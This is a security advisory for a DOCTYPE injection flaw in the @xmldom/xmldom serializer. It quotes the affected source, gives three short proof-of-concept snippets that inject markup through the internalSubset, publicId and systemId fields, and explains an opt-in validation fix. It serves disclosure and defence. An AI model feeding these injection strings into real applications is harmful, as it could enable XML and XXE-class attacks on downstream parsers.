CVE-2026-41674
ADVISORY - githubSummary
Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only through programmatic
createDocumentType calls with attacker-controlled arguments.
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
validateQualifiedName(qualifiedName); // only qualifiedName is validated
var node = new DocumentType(PDC);
node.name = qualifiedName;
node.nodeName = qualifiedName;
node.publicId = publicId || ''; // stored verbatim
node.systemId = systemId || ''; // stored verbatim
node.internalSubset = internalSubset || ''; // stored verbatim
node.childNodes = new NodeList();
return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
var pubid = node.publicId;
var sysid = node.systemId;
buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
if (pubid) {
buf.push(' ', g.PUBLIC, ' ', pubid);
if (sysid && sysid !== '.') {
buf.push(' ', sysid);
}
} else if (sysid && sysid !== '.') {
buf.push(' ', g.SYSTEM, ' ', sysid);
}
if (node.internalSubset) {
buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
}
buf.push('>');
return;
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'',
']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// ^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'"injected PUBLIC_ID" SYSTEM "evil"',
'',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'"sysid"><injected attr="pwn"/>',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true }is explicitly passed. Applications that pass untrusted data tocreateDocumentType()or write untrusted values directly to aDocumentTypenode'spublicId,systemId, orinternalSubsetproperties should audit allserializeToString()call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
publicId: throws if non-empty and does not match the XMLPubidLiteralproduction (XML 1.0 [12])systemId: throws if non-empty and does not match the XMLSystemLiteralproduction (XML 1.0 [11])internalSubset: throws if it contains]>(which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// Opt-in guard: throws InvalidStateError
try {
new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
console.log(e.name, e.message);
// InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
Common Weakness Enumeration (CWE)
XML Injection (aka Blind XPath Injection)
XML Injection (aka Blind XPath Injection)
NIST
-
CVSS SCORE
8.7highGitHub
-
CVSS SCORE
8.7highDebian
-
Ubuntu
-
CVSS SCORE
N/AmediumChainguard
CGA-93f6-hh34-rp9x
-
minimos
MINI-gfpj-ghf9-x3vj
-